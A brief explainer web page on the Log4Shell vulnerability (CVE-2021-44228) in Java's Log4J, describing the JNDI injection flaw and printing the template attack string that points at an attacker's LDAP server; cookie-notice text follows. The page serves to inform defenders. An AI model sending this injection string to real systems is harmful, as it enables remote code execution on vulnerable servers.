What is Log4Shell?

Log4Shell is a remote vulnerability that affects the Java Log4J component used by thousands of applications to keep logs of application activity.

The name Log4Shell was assigned to the vulnerability identified by Miter as CVE-2021-44228 and it took advantage of a data filtering flaw that reaches this component, allowing a JNDI injection to be carried out. Through this flaw it was possible to inject specially crafted strings that allowed arbitrary code execution.

In most cases, it was simply necessary to add this content to any HTTP request to force the Log4J component to establish a connection against the attacker’s ldap server and execute arbitrary code.

${jndi:ldap://[server]/[payload]}

We are using cookies to give you the best experience on our website. You can find out more about which cookies we are using or switch them off in Cookies Settings

Necessary

Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.

Necessary cookies

3rd Party Cookies

This website uses Google Analytics to collect anonymous information such as the number of visitors to the site, and the most popular pages. Keeping this cookie enabled helps us to improve our website.

3rd party cookies

Cookies policy